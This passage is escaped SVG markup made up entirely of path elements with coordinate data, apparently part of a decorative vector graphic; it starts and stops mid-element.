d=\"M755.5,28.2c2.7.2-2.4-1.1.5-.9-2.8-.4-2.2-.6-4.3-.9C753.8,27.2,751.7,27.1,755.5,28.2Z\"></path>\n <path d=\"M769.3,28.7c-3.3-.6-1.8.1-3.9-.1,2.5.4,1.2.7,3.4,1.1a5.85,5.85,0,0,1,2,.2c-2.2-.9.8.1,1.9-.1C769.8,29,767.5,28.9,769.3,28.7Z\"></path>\n <path d=\"M894.1,49.3c-3.4-.7-2.9.4.4.8C895.2,49.9,891.9,49.2,894.1,49.3Z\"></path>\n <path d=\"M1097.3,82.7a4.69,4.69,0,0,0,2.5,1.3c-.6-.4,1.8.1.8-.4C1096.4,82.9,1101.5,83.4,1097.3,82.7Z\"></path>\n <path d=\"M833,38.6c-.4.1-3.3-.4-1.9.1,1.2.2,3,.5,3.2.6s0,.3,1.2.5C836.9,39.8,834.7,39.2,833,38.6Z\"></path>\n <path d=\"M768.9,27.8c-1,0-2-.1-3-.2.2-.2-.5-.5-2.3-.8-.4.3,2.5.9.3.7,2,.3,2.4.5,4.3.8C766.3,27.7,772.4,28.6,768.9,27.8Z\"></path>\n <path d=\"M773.8,28c-.8.1-4.2-.6-2.9.1,1.6.2,3.9.7,4.1.6a10.32,10.32,0,0,1-2.2-.5C772.8,28,777.4,28.7,773.8,28Z\"></path>\n <path d=\"M756.1,25.3c.2-.2,3.1.3,4,.2-2.4-.4-4-.7-5.2-.8C755.1,24.9,754.9,25,756.1,25.3Z\"></path>\n <path d=\"M775.5,27.5c-.2.2-3.8-.5-4-.3,3.8.5,1.9.7,5.4,1.2C776.2,28.1,777.9,27.9,775.5,27.5Z\"></path>\n <path d=\"M800.7,31.7c-5.5-1.1-2.1.5.2.5C798.3,31.7,800.5,31.7,800.7,31.7Z\"></path>\n <path d=\"M767,25.8c.4.3,9,1.8,5.2.9,0,.1-.1.1-1-.1-.2-.2,0-.3-1.2-.5C770.1,26.3,767.2,25.7,767,25.8Z\"></path>\n <path d=\"M798.2,30.4c-4.8-.6-3.8-.4-6.4-1.3-.3.3-.2.4-2.8.2,3.2.7,4.3.7,7.5,1.5,1.1,0,1.1-.1-.2-.5C797.5,30.4,798.7,30.6,798.2,30.4Z\"></path>\n <path d=\"M775,26.4c-3.3-.6-4.2-.6-5.1-.5,1.8.3,3.3.6,4.3.8C773.9,26.4,775.3,26.6,775,26.4Z\"></path>\n <path d=\"M868.2,41.4c-.6.3,5.7,1.5,6.5,1.4C872.5,42.4,870.4,41.9,868.2,41.4Z\"></path>\n <path d=\"M1213.9,98.1c-.4.2-2.2.4,1.4,1C1214.6,98.7,1216.3,98.5,1213.9,98.1Z\"></path>\n <path d=\"M1148.4,86.3c-1.6-.1-.9.7,2.5,1.3A7.85,7.85,0,0,0,1148.4,86.3Z\"></path>\n <path d=\"M1152.3,82.2c-1.8,1.1-9.7,2-4.9,4.1,4.7,0,9.5-.3,3.7-2.5,1.9,0,2.6.8,4.2.7C1151.7,83.3,1155.1,82.7,1152.3,82.2Z\"></path>\n <path d=\"M911.4,47c-.8-.4.1-.3,1.2-.2s2.4.3,2.7.3a22.5,22.5,0,0,0-2.7-.5C910,46.2,907.8,46.3,911.4,47Z\"></path>\n <path d=\"M860.1,36.5a5.77,5.77,0,0,0-2.3,1.2c2.7.4,4,.5,4,.2C857.7,37.1,863.6,37.4,860.1,36.5Z\"></path>\n <path d=\"M756.2,19.3c-1.5-.1-6.4-.6-2.8.3C752,18.9,759.3,20,756.2,19.3Z\"></path>\n <path d=\"M842,33.1c5.8,1.3,3.8,1.5,5.8,2.1.2-.2,4.9.8,4,.2-4.6-.6-3-.9-4.5-1.4C844.1,33.5,845.3,33.7,842,33.1Z\"></path>\n <path d=\"M850.7,35c1.5.3,1.9.5,3.2.8-1.7-.8-.4-.7.5-1C851.1,34.2,850.1,34.4,850.7,35Z\"></path>\n <path d=\"M1133.4,81.1c-4.5-.8-3.3,0,.3.6Z\"></path>\n <path d=\"M890,40.4c-2.4-.1,1.4.8,3.5,1.2C894.2,41.3,891.5,40.8,890,40.4Z\"></path>\n <path d=\"M820.8,29a41.32,41.32,0,0,0-5.2-.8c1.7.3.7.4,2.3.7.1-.1-.4-.4.9-.2S821,29.3,820.8,29Z\"></path>\n <path d=\"M851.3,34.3c1.7.1.1-1-2.4-1.1C852.2,33.9,846.6,33.5,851.3,34.3Z\"></path>\n <path d=\"M741.7,15.1c.2.2-.7.1-2-.2.7.3-.9.5,1.4.9C739.4,15.1,745.5,16,741.7,15.1Z\"></path>\n <path d=\"M912.7,44.2c1.7.2,2-.1.1-.5h-.1c-.4.1-2-.1-1.7.2C911.6,44,912.2,44.1,912.7,44.2Z\"></path>\n <path d=\"M755.6,15.7c-3.7-.6-3.3-.9-6.5-1.4,3.3.9,1.6,1.2,4.8,1.9C752.3,15.5,755.3,16,755.6,15.7Z\"></path>\n <path d=\"M862.3,32.9c1.5.6-5.3-.2.4.8C861.7,33.3,865.6,33.6,862.3,32.9Z\"></path>\n <path d=\"M909.2,40.2a5.13,5.13,0,0,0,2.4,1.1c1.2-.1-.3-.2.8-.4Z\"></path>\n <path d=\"M855.6,31a5,5,0,0,0-2.3-.8c-.5.1-2,0-2.9.1a28.64,28.64,0,0,1,3.2.6C853.7,30.8,853.8,30.7,855.6,31Z\"></path>\n <path d=\"M735,11.1c3.4.6,5,.7,5,.4A22,22,0,0,0,735,11.1Z\"></path>\n <path d=\"M1217.9,88c-.1-.3-.7-.8.7-.7C1214.2,86.6,1215.8,87.4,1217.9,88Z\"></path>\n <path d=\"M893.1,32.6c-.3-.4.5-.7-2.5-1.2C890.7,31.8,891.4,32.1,893.1,32.6Z\"></path>\n <path d=\"M885,29.7c.6.6-3.4-.5-5.2-.8-.5.1-2,0-2.9.1,3.2.2,10.4,1.6,12.3,1.5C887.4,30.2,886,29.9,885,29.7Z\"></path>\n <path d=\"M891.9,29.9c-1-.7-5.4-1.8-.6-1.2-3.1-.7-8.5-1.5-10.7-2.1a.35.35,0,0,0,.1.2c3.1.6,5.9,1.3,7.6,1.8C884.4,28.1,889.4,29.4,891.9,29.9Z\"></path>\n <path d=\"M860.4,24.6c3.2.7,4.3.2,1.8-.3C861.8,24.5,859.3,24,860.4,24.6Z\"></path>\n <path d=\"M1216.1,82c.9.7-.5.8,2.6,1.4C1218.6,83,1218.2,82.5,1216.1,82Z\"></path>\n <path d=\"M872.3,25.2c-1.5-.4,0-.7-3.5-1.2C869,24.3,869,24.7,872.3,25.2Z\"></path>\n <path d=\"M861.4,22.8c-1.8-.3-3.3-.6-4.3-.8a19.44,19.44,0,0,0,5.5,1.5C861.2,23.1,861.6,23,861.4,22.8Z\"></path>\n <path d=\"M872.3,23.1c-2.3-.3-3.6-.4-4-.2,1.4.2,2.3.4,3.2.6C870.5,23.1,872.8,23.5,872.3,23.1Z\"></path>\n <path d=\"M889.7,25.2c-2.6-.4-4.2-.5-6.1-.7,1.6.3,1.1.5,1.3.7,1.4.4,3.9.8,5.4,1.1-.1-.2-.2-.3-.2-.5a27,27,0,0,1-3.1-.5.3.3,0,0,0-.1-.2C888.7,25.6,890.4,25.7,889.7,25.2Z\"></path>\n <path d=\"M879,23.1a15,15,0,0,1-2.1-.4,4.83,4.83,0,0,0-2.2-.6c-.4.2.9.6,2.2.9C877.8,23.1,878.7,23.3,879,23.1Z\"></path>\n <path d=\"M883.5,20.2c4.6.8,2.6-.1,2.7-.4C880.8,18.9,885.4,20.1,883.5,20.2Z\"></path>\n <path d=\"M868.9,15.9c-3.3-.5-6.3-.6-8.4-1.4.5.4-4-.6-2.9,0,4.3.5,8.4,1.6,11.5,1.9C865.9,15.8,870,16.3,868.9,15.9Z\"></path>\n <path d=\"M887.4,18.3c-.8-.1-2.4.4,1.4.9C886.7,18.6,890.2,19,887.4,18.3Z\"></path>\n <path d=\"M871.6,15.4a26.52,26.52,0,0,1,5.5,1.3c.3.1.6.1,1,.2-.6-.8,3.8-.5-.7-1.6.2.2,0,.2-.3.3s-.9.1-.3.5C875.3,16,871.3,15.2,871.6,15.4Z\"></path>\n <path d=\"M911,19c-2.8-.6-4.8-.2-.8.4C909.2,18.9,911.6,19.4,911,19Z\"></path>\n <path d=\"M900.4,17.1c4.9.8,8.6,1.3,12.4,1.7-3.4-.6-3.3-1-6.5-1.5C910.3,18.6,902,17,900.4,17.1Z\"></path>\n <path d=\"M1309.9,84.2c.9.5-1.6.1-.7.5,2.4.4,4,.6,5.2.8C1314.5,85.1,1312.9,84.7,1309.9,84.2Z\"></path>\n <path d=\"M874.8,11.9c.1.2-2.9-.4-3-.3,2.8.4,2.2.6,4.3.9C877.3,12.6,877.2,12.3,874.8,11.9Z\"></path>\n <path d=\"M895.9,15.7c.3-.3-1.2-.7-4.4-1.2C891.8,14.9,893.2,15.3,895.9,15.7Z\"></path>\n <path d=\"M885.9,12.9c1.1.4.3.6,3.4,1.1,1.4.1.8-.3.7-.7C886.5,12.7,889.4,13.7,885.9,12.9Z\"></path>\n <path d=\"M886.6,12.3c-6-1.1-1.2.6,1.2.5C886.6,12.6,886.6,12.4,886.6,12.3Z\"></path>\n <path d=\"M892.2,11.9c.2.4,2.9.9,4.5,1.4,1.2,0,5.4.3.7-.7C898.2,13.4,894.2,12.3,892.2,11.9Z\"></path>\n <path d=\"M882.6,7.8c.3-.3,2.9-.3-1.3-.8C883.9,7.6,877.7,7,882.6,7.8Z\"></path>\n <path d=\"M877.4,5.7a24.14,24.14,0,0,1-2.8-.5,6.24,6.24,0,0,0,2.8.7,44,44,0,0,0,5.5.4C880.1,5.6,879.4,5.9,877.4,5.7Z\"></path>\n <path d=\"M768.7,106.5a14,14,0,0,0-4.6-1.5C766.1,105.4,766.2,106.4,768.7,106.5Z\"></path>\n <path d=\"M910.8,116.3a31.2,31.2,0,0,1,5.4,1.2,9.92,9.92,0,0,1-2.5-1.3C910.4,115.7,911.6,116.3,910.8,116.3Z\"></path>\n <path d=\"M917.6,103.9c1.5.2,5.5,1,5.2.8-4.3-1,1-.7-3.7-1.6,0,.3,1.3,1-1.7.5a5.7,5.7,0,0,0-2.3-.8c-.3.3,2.6,1.1,4.4,1.2C919.9,104.2,918.2,103.9,917.6,103.9Z\"></path>\n <path d=\"M743,70a10.32,10.32,0,0,1-2.2-.5c-.1-.1.8,0,.9-.1-3.7-.6-1.2.4-.7.6C741.1,69.8,743.7,70.3,743,70Z\"></path>\n <path d=\"M893.4,89.4c-.5.4-6.9-1.3-7.2-.9C890.1,89.3,896,90.1,893.4,89.4Z\"></path>\n <path d=\"M823.8,75.1c-.6.5,1.2,1.1-1.5,1,2.1.3,1.5.5,4.3.9C823.9,76.2,830,76.1,823.8,75.1Z\"></path>\n <path d=\"M903.3,87.9c3.6.5,3.3.2,6.3,1a12.75,12.75,0,0,1,3.9.1,1.68,1.68,0,0,0,1,.2c-1.1-.4-3.6-.8-4.4-1.2,2.3-.2,2-1,5.4-.9-3.4-.7-2,0-4-.3-.1-.1-.2-.2-1.1-.3.6-.2,4.7.5,5,.3-4.4-.8,1-.3-2.4-1-1.6,0-.4.7-3.8.3.2-.2,1.7-.4-1.5-1.1q.45.45-1.8.3c-1.6-.6,2.3-.3-.4-.8-2.6.4-11.5.7-12,1.2,1.5.1,0-.6,3.9.1-1.2.2-.2.3,3.3.8-.2.2-3.5-.4-2.9.1C902,87.1,906.1,88,903.3,87.9Z\"></path>\n <path d=\"M945.6,93.3c5.7,1.3,5.4,2.2,12.3,3.5-1.5-.5,2.8,0-.3-.6C954.3,96.3,950,93.7,945.6,93.3Z\"></path>\n <path d=\"M928.2,89.2c-3.7-.6,2,0-1.2-.5-7.4-.5-1.7,1.7-4.1,1.5,2.1.3,4.5,1.2,6.3,1.2C922.7,90,925.6,89.1,928.2,89.2Z\"></path>\n <path d=\"M1057,110.4a8.82,8.82,0,0,1,2.9,0c0,.3-1.8,0,1.3.7,2.2.1-1.5-.9-3.5-1.4C1059.2,110.4,1053.9,109.7,1057,110.4Z\"></path>\n <path d=\"M931.9,88.8c-6.7-1.2-.3.9,1.3.8C930.9,89.2,932.5,89.1,931.9,88.8Z\"></path>\n <path d=\"M914,85.9c2.5-.6.8-1.8,3.7-2.4-3.2-.3-3.1-.7-4.2-.7,2.2,1.3,1.6,1.7-4.2,1.3,2.7.5,4.1.9,4.4,1.2-1.8-.3-3.3-.5-4.1-.6C909.9,85,911.4,85.4,914,85.9Z\"></path>\n <path d=\"M1047.5,98.3c-.1.1.3.4-.9.2,0-.3.3-.5,1.8-.4,3.3.5,8.4,1.8,9.6,1.8-4.3-.9-9.4-2.4-4.8-2-3.5-.7-.6.3-4.1-.5.2-.1,1.4,0,.8-.3a19.25,19.25,0,0,0,3.1.5c-1.4-.6,1.5,0,1.9-.1-6.2-1.1-3,.2-10.2-1.1-5.8.1,1.8,3.1-3.2,3.5,1.6.5,2.1.4,3.3.8-3.4-.4,0,.4-1.7.5a16.33,16.33,0,0,1,4.4,1.1,26.85,26.85,0,0,1-4.1-.5c-1.8-.4-.2-.6-2.4-1,.6.3-2.9.1-.7.5a47.56,47.56,0,0,1,7.4,1.3c3-.2.1-1.3-3.1-2.4,0,.1-.8,0-1-.2,2.4.4,1-.2,3,.2s1.7.8,3.5,1.2a18.21,18.21,0,0,1,3.2.5C1049.1,100.1,1053.7,100.2,1047.5,98.3Z\"></path>\n <path d=\"M797,27.8c-1.8-.1-3.1-.7-5.2-.8,6.4,1.5,1.7,1.5,6.2,2.9-2.5-1.3,4.3-1.5-2.6-3.4a6.52,6.52,0,0,0,1.7-.3c-1.1,0-4.9-1.1-6.2-.9C794.5,26.2,791.2,26.6,797,27.8Z\"></path>\n <path d=\"M861.8,6.9c5,.9,1.6.4,1.3.7q3.45.6,3.3.9a12.79,12.79,0,0,0-2.9.1c3.6.5,4.4.3,7,.5a35.67,35.67,0,0,1-5.4-1.2c.2-.2,3.1.3,4,.2-2.7-.4-4.5-.8-4.4-1.1C863.3,6.8,861.5,6.6,861.8,6.9Z\"></path>\n <path d=\"M910.5,13.7c-3.1.2-6.8-.5-13.2-1.3,2.4.8,3.9.6,5.3,1-2.8-.3,1.9.8,2.4,1.1-1,.7-3.4.8,0,2.1-1.9-.2-3.7-.9-4.2-.7,3.7.5,1.1.7,4.4,1.2-1.6-.8-.6-.2,3.1.4-.7-.4-1.8-.9-2.5-1.3,1.2,0,3.9.5,5.1.5-3.2-.6,2.3.2.8-.3-3-.6-2.7-.3-5.2-.8a8.44,8.44,0,0,0-1.2-.4c2.5.3,4.8.7,5,.4a27,27,0,0,1-3.1-.5c1.9.3-2.7-1.4,2.9-.1.1-.2-1.3-.8,1.9-.1C909.1,14,915.8,14.8,910.5,13.7Z\"></path>\n <path d=\"M922.9,80c.8-.1,2.8.2,1.8-.4C921.5,79,922.3,80,922.9,80Z\"></path>\n <path d=\"M887.1,73.8c-.1-.2-.2-.3-.2-.5-2.5-.5-2.2-.2-5.2-.7-.3-.3.8-.4-2.3-.8a11.18,11.18,0,0,0,3.5,1.2C883.7,72.8,885.7,73.6,887.1,73.8Z\"></path>\n <path d=\"M1027,96.2c.8.1,1.5.3,2.3.4,2.9-.2,1.2-.7,3.5-.7C1029.4,95.4,1028.3,96.2,1027,96.2Z\"></path>\n <path d=\"M1047.2,95.7c-1.7-.1-6.4-.5-3.8.1C1042.6,95.2,1049,96.6,1047.2,95.7Z\"></path>\n <path d=\"M924.7,75.5c4.7.9,2-.1,6.1.7,2.2.7-.8.4,1.4.9-1-.6,7,.8,5,.3a39,39,0,0,1-6.5-1.4c1.9.1,1.7-.2.7-.5-1.8-.1-1,.7-5-.3C927.2,75.6,923.4,74.9,924.7,75.5Z\"></path>\n <path d=\"M746.9,45.1a23.56,23.56,0,0,1,4.1.5,12.3,12.3,0,0,0-3.4-1.1C750.8,45.2,743.9,44.7,746.9,45.1Z\"></path>\n <path d=\"M1022.3,87.9l.3.6a18.2,18.2,0,0,0,3.1.5C1023.4,88.6,1025.6,88.4,1022.3,87.9Z\"></path>\n <path d=\"M810.2,50a13,13,0,0,1-3.1-.4c1.2.7-1.6-.1-1.9,0,1.11.21,2.21.48,3.3.8-2.6-.5-2.5.1-.7.7-.8-.4.2-.4,3,.2.4.6,1.1.6.4,1,4.3.7,2,1,5.6,1.6-4.1-1.2.1-1.4-8.2-3.2C807.4,50,813.6,50.9,810.2,50Z\"></path>\n <path d=\"M1046.7,90.4c3.2.4,1.4-.5,3.7-.4,5.9,1.4,7.3,2.7.9,1.9-1-.5,1.3-.1.8-.4-3.7-.5-4.4.6.7,1.4-.5-.9,4.8-.2,7.7-.2-1.2-.2-3-.5-3.2-.6,5.3,1,.3-.3,3.9.1-1.5,0,3.7.9,3.2.6-2.5-.4-2.5-.8-4.4-1.2.9.4-2.1-.1-3-.2.2-.2-1.5-.5-2.3-.7,4,.4,5.5.8,7.1.6-3.4-.6-3.1-.3-5.3-.9,1.4.7-3.5-.3-3.9-.1-.1-.1-.1-.2-.2-.4-1.4-.2-2.8-.5-4.2-.7C1049.9,90.2,1045,89.9,1046.7,90.4Z\"></path>\n <path d=\"M1055.8,93.2a47.23,47.23,0,0,0,4.9.2C1056.2,92.5,1054.6,92.9,1055.8,93.2Z\"></path>\n <path d=\"M1202.1,116.5c2.6.5,2.2.2,5.2.8C1207,116.2,1206,116.7,1202.1,116.5Z\"></path>\n <path d=\"M948.2,74c4.8.6,3.5-.2,2.1-.9-.7-.4-1.5-.7-1-.8-3-.3-1.4.3-.2.8.9.4,1.6.8-.1.7-3.6-.6,2.6,0-2.3-.7C947.5,73.4,945.9,73.6,948.2,74Z\"></path>\n <path d=\"M901,66.1c1.4.2,2.8.5,4.2.7C906.2,65.9,904.9,66.5,901,66.1Z\"></path>\n <path d=\"M961.1,74.7c-1.3-.2-5.6.3-1.5.9C957.4,75,961.7,75.2,961.1,74.7Z\"></path>\n <path d=\"M986.7,77.8c.3.5-6.9,1.1.9,1.9C988.9,79.3,989.9,79.1,986.7,77.8Z\"></path>\n <path d=\"M817.5,49c-5.5-.9-6-2.7-2.1-2.5.8.6.4.8,1.5,1.3-.1-.2,2.9.4,3,.3-.3-.2-.8-.9-3.5-1.2,3,.3.6-.5,1.7-.5-3.1-.4-5.6-1.3-3.4-1a2.57,2.57,0,0,0,1.1.4c6.4-.1-3.8-3.2,4.5-2.8-1.5-.5-5.1-.7-5.3-1,5.7.4-2.3-2,4.1-1.7-1.08-.15-2.14-.35-3.2-.6,2.8.3,1.6-.9-.6-1.2.9-.3,3.6-.2,8.1.8-4.4-1.2,1.7-.3-.5-1-1.6.3-3-.9-6.5-1.4-.5.5-1.3.6,1.6,1.4-7.5-.1-1.9,2.5-4.3,3.3a32.89,32.89,0,0,1-5.2-.9c2.9.9,4.4,1.8,1.8,1.7,2.9.5,3.2.8,3.4,1.1-1.3-.2-1.5-.4-3.2-.6,0,.2.6.3,1.2.5-1.1-.2-1.3-.3-2.2-.5,1.6.6-2.6.1.3.7a6.05,6.05,0,0,1,1.9,0c-.1.2,1.3.5,1.3.7-4-.8-1.8,0-5.1-.6,3.1.9,3.4,1.1,1.6,1.4a24.16,24.16,0,0,1,4.3.9c-5-1.1-3.9.1-1.6.7-1.4-.2-2.3-.4-3.2-.6,1.2.9.9,1.6-2.1,1.6,4.7.7,3.3,1.3,2.6,1.4-1.3-.3-2.4-.5-3.3-.8,3,.7,2.7,0,.8-.3.9.8-3.3-.1-5-.3a72,72,0,0,0,10.6,2c-.4-.4-2.6-1.7,1.5-.9-3-.4,1.7.5,1.2.5-.6.4.4.5-.6.8a14,14,0,0,1,3.2.8c0-.2,3.4.5,3,.2C815.3,50.2,822.3,50.4,817.5,49Z\"></path>\n <path d=\"M983.5,77.3c-.2-.4-3.9-1.1-5.6-1.6C975,74.8,979.8,76.8,983.5,77.3Z\"></path>\n <path d=\"M888.4,59.9c2.4.2,1.7-.3-1.4-1,.6.9,1.9,1.6,0,2,1.4.2,4.1,1.1,4.3.8-3.7-1-.3-1,2.4-1C891.1,60.2,891.4,60.5,888.4,59.9Z\"></path>\n <path d=\"M1043,84.4c-1.7.2,2.5,1,.6,1.2,6,1,.4-1-1.7-1.6-.4.1-5.1,0-2.8.2C1040.8,84.4,1040.5,84.1,1043,84.4Z\"></path>\n <path d=\"M789.8,41.4c-6.2-1.1,1.8-.1-3.4-1.1.4.3-1.3,0-1.9,0,5.8,1.2-1.2.9,2.8,1.9C786.8,41.6,787.1,41.2,789.8,41.4Z\"></path>\n <path d=\"M792,42c.1.4-3.6-.8-3.1-.4,1,.3.4.4,1.4.9,1.4.2,2.8.5,4.2.7C794.1,42.8,795,42.5,792,42Z\"></path>\n <path d=\"M896.8,59.3c-.4-.3,5.4.5,1.8-.4.5.3-3-.4-3-.2,2.3.5-1.4.3,2.4,1.1.4-.2,1.7.5,3.2.6C902.2,60.2,897.6,59.7,896.8,59.3Z\"></path>\n <path d=\"M1015.1,78.7c3.3.6,1.9,0,5.1.6,0-.1-.1-.2-.2-.4C1017.3,78.6,1017.2,78.9,1015.1,78.7Z\"></path>\n <path d=\"M905.3,56.6c-5.8-.8-5.7-.6-10.3-1.4-.1.5,2.2,1-.6.8,7.5,1.4.4,1.3,2.8,1.9,2.6.2,0-.9,4.8-.1,2.6.6-1.7,0,1.3.7-.2-.6,1.4-1-1.9-2,3,.6,2.6.3,5.2.8C906.7,57.1,905.2,56.8,905.3,56.6Z\"></path>\n <path d=\"M1143,95.6c-.8-1.1-4.4-2.8-.3-2.8-3.8-.5-1.7,0-4.3-.8,1.7,1-8.7.1-3.1,1.7a19.06,19.06,0,0,0-3.1-.4c4.5.7.7.5-.8.3,2,.9-.5,1.3-1,1.9,2.5.3,5.2,1.1,5.3.9-1.5-.3-1.3-.5-2.3-.7,6.5,1.1,4.9.5,9.3,1.2-4.8-.9,1.4-1-3.7-1.7C1139,95,1142.5,95.7,1143,95.6Z\"></path>\n <path d=\"M792.2,36.3c-2.7,0-.7,1.1,1.9,2-1-.6,1-.4.6-.8C790.2,36.8,796.2,37,792.2,36.3Z\"></path>\n <path d=\"M902.9,53.5c2.6.5,3.4.8,4.1.6-2.8-.4.7-.5-3.4-1-.9.1,3.3.9.2.5-3.9-1.1-2.7-1.8-1.9-2-6.7-1.4-3.7.6-3.3,1.1l-2.1-.3c.7-.2-1.8-.6-2.4-1,.3-.2,2.1.1,1.8-.3-3.5-.6-1.5.2-2.8.2,1.1.4,3.4.9,3.5,1.2-4.4-.5-.7.6-3.6.5q3.45.6,3.3.9a19.07,19.07,0,0,0-2-.2c0-.2-.9-.4-2.3-.7,1,.6-.2.7-2.7.4,3.6.4.8.5,3.3.9,2.3.2-1.5-1.1,3.9,0-.3.1-1.4,0-.8.3,4.5.8,5.3.8,8.5,1.6.9-.3-3.7-1-3.5-1.4,3.7.7,5.5,1.3,6.2.9-4.2-.7-6.3-1.3-6.6-1.8C905.2,55.2,901.7,53.6,902.9,53.5Z\"></path>\n <path d=\"M753.8,28.6c3.9.5,2.2.7,5.4,1.1,1.5.1-.7-.9-2.3-.7-.3-.3,4.9.1-.4-.8,1.5.8-1.8.6-4-.2-2.9-.3,2.1,1.4-2.6.6,3.2.8,2.3.9,3.6,1.5C756.8,30.2,750.3,28.4,753.8,28.6Z\"></path>\n <path d=\"M866.5,46c-1.6,0-6.8-1.1-5.1-.6,5.5,1,2.2,1.3,5.6,1.7C866.2,46.8,865.9,46.4,866.5,46Z\"></path>\n <path d=\"M752.4,25.5c-4.1-.5-10.9-1.9-13.6-2.1,5.3,1,5.7,1.6,9.9,2.5C746.1,24.9,749.4,25.3,752.4,25.5Z\"></path>\n <path d=\"M894.3,47.7c-2.1.2,1.6,1.5-1.4,1.2,7,1.2,3.5,1,5.7,1.8,2,.4,2.3.3,4.1.6-.1-.2-.2-.5-.3-.7-4.2-.8-1.7-1.1-1.5-1.1a42.22,42.22,0,0,0,4.3.8c.3-.2-2-.6-1.3-.8-3.5-.7-.6.3-4.1-.5.7-.2-1.6-.6-1.3-.8,5.9.6,5.2-.4,3.3-1.2C894.9,46.2,899.5,49.3,894.3,47.7Z\"></path>\n <path d=\"M902.5,29.9c-5.4-.8,0,1.3-4.5.8.2-.3-6.3-1.5-5.2-.9,7.9,1,7.5,3,7.5,3.6,2.6.4-.6.8,2.7,1.6-.9,0-3.8-.6-3-.2,3.5.5,3.4,1.3,5.8,2.1-1.3-.2-1.4-.1-3.1-.4.1-.3-.2-.6-3.4-1.1,2.6.8,1,1.3,0,1.7a14.29,14.29,0,0,0-4.5-1.2c3,.6-.1.5.3.7,1.3.2,2.6.4,3.8.6-.5.3-.5.6.8,1-3.3-.6-2.1-.4-5.3-.9.1.3,2,.7,1.4.9-3.9-.7-4.5-.6-3.9-.1,2.5.2,2,.1,6.1.6.5.3,1.7.8.3.7-4.8-1.3-.5.2-5.2-.9a23,23,0,0,1-4.5.8c4,.7.4-.5,5,.4.1.2.2.5.3.7a21,21,0,0,0-4.1-.5c10,1.6,1.9,2.3,9.7,4.2-1.6-.3-2.7-.6-4.3-.9.4.3-1.3,0-1.9,0,1.5.5,3.1.3,4.3.8.4.5-.4.2-2-.2-.6.4,5.1,1.1,4.5,1.4-6.7-1.2.8.7-3.8,0,4.4,1,0,.5.5,1.1,4.5.9-.1-.6,2.9-.1.1.2,1.9.4,2.2.6a62.51,62.51,0,0,0,7.1.7c-6.9-1.1.8-.2-2.4-1.1,1.6.4,2.6.6,3.1.4-2.4-.4-1.3-.5-3.3-.9-.3.2-.1.5-2.9,0-2.2-1.5,2.1-1.5,5.8-2.2,4.1.9-1.5.6.5,1a17,17,0,0,1,3.1.5h0v-.1a.33.33,0,0,1,0-.47h0a.18.18,0,0,0,0-.27h0a6.37,6.37,0,0,0-1.7-.6c-.1.1-.2.2-2-.1-1.4-.6.5-.4-1.4-.9-8.6-1-4.5-2-2.9-2,.9-.3-2.8-.8-2.4-1.1,4,.6,5.5.5,3.8-.1-5.1-1-1.1.5-4.9-.1-.9-.6,3.8,0,.5-.9a29.59,29.59,0,0,0,5.2.8c-3-1.4-.3-1.4-3.2-2.6,2.1.3,1.5.6,4.3.9-2.1-1.9.1-3.1-3.4-5.2,3.8.7.7-.6,4,.1-4.3-1.2,1.9-.8-3-2.2,0,.1-1.3-.1-1.1-.3,2.8.4,2.2.6,4.3.9-.7-.3.9-.5-1.4-.9-.1.1-.2.2-2-.1-.1-.8,2-1,4.3-1.2,1.5.6,1,.6-.7.6,1.9.3,2.3.3,4,.6h.2a.3.3,0,0,1-.2-.1c-3.1-1.5-8.9-2.8-8.5-3.9-4.2-.8-2.4-.1-5.1-.5.2.4,2.9.9,3.5,1.2-4.6,0,.1,2.2.4,3a28.56,28.56,0,0,0-4.3-.9C899,29.1,901.3,29.5,902.5,29.9Z\"></path>\n <path d=\"M907.2,42c.5-.1-1.5-.8.8-.4,1.1.2,2.6.4,1,.1-1.4-.2-2.8-.5-4.2-.7C906.5,41.4,903.8,41.3,907.2,42Z\"></path>\n <path d=\"M909.1,48.3c-.8.2-2.1-.5-3.2-.6a5.88,5.88,0,0,1-2-.2c-.1.5,4.1.8,4.4,1.1-3.1-.4-2.9.1-3.7.4C907.7,49.2,909.7,48.6,909.1,48.3Z\"></path>\n <path d=\"M738.1,23.9c-1.8-.7.8-.5-2.5-1.2C732.6,22.5,739.1,24.3,738.1,23.9Z\"></path>\n <path d=\"M846.8,41.2c-.8.2,4.8,1.7,4.4,1.2C846.9,41.9,851.1,41.8,846.8,41.2Z\"></path>\n <path d=\"M839.8,40.7c3.3.6,1.9,0,5.1.6-.6-.3.9-.4-1.3-.8C845.2,41.4,840,40.4,839.8,40.7Z\"></path>\n <path d=\"M772.5,29.2c-1.9.3,10.2,2,5.3.9C777.6,30.6,774.4,29.5,772.5,29.2Z\"></path>\n <path d=\"M757.7,26.5c-.3-.2.2-.4-1.3-.7-.7,0-2.7.4-.8.4.1-.4,4.1,1,4.1.6Z\"></path>\n <path d=\"M763.2,25.9a1.82,1.82,0,0,0-1.1-.2c4.2.8-.1.3.3.7,3.4.4,3.1-.2,8.1.7-2.1-.3-1.5-.6-4.3-.9C766.5,26.4,765.3,26.3,763.2,25.9Z\"></path>\n <path d=\"M774.2,24.6c-1,.2,2.2.5,2.5.7.2,0,.5-.1.7-.1C776,25,775.1,24.8,774.2,24.6Z\"></path>\n <path d=\"M776.7,25.3a.37.37,0,0,0-.3.1h.2C776.7,25.4,776.7,25.4,776.7,25.3Z\"></path>\n <path d=\"M768.8,23.4c-2.8.1-1.2.2-.4,1.2,5.6,1.1,3.4,1,8.8,2.4-2.4-1-2.2-1.3-.9-1.5-2-.4-2.1-.6-4.2-1-.7.3,3.4,1.2-.7.7C768.1,24.1,773.5,24.3,768.8,23.4Z\"></path>\n <path d=\"M752.7,22.1c-4.3-1.2-3.1-1.9-8.1-2.8C747.3,20.3,748.1,21.1,752.7,22.1Z\"></path>\n <path d=\"M847.2,35.8c2.5.5,1.3.7,3.4,1.1.7-.4-2.4-1.2,1.5-1C849,35.5,849.5,36.1,847.2,35.8Z\"></path>\n <path d=\"M744.4,18.9c1.4.2,2.3.4,3.2.6.3-.4-.8-.8-3.5-1.4C745.7,18.7,747.1,19,744.4,18.9Z\"></path>\n <path d=\"M736.1,17.6a10.11,10.11,0,0,1,3,.3c1,0,.8-.3,1.8-.3a17.84,17.84,0,0,1-3.3-.8c-1.9-.1.6.4,1.3.8C738.3,17.6,732.9,16.9,736.1,17.6Z\"></path>\n <path d=\"M874.1,39.7c.6-.5-1.7-1.3.4-1.3-2-.1-9.5-1.1-5.8,0C871.1,38.4,872.5,39.3,874.1,39.7Z\"></path>\n <path 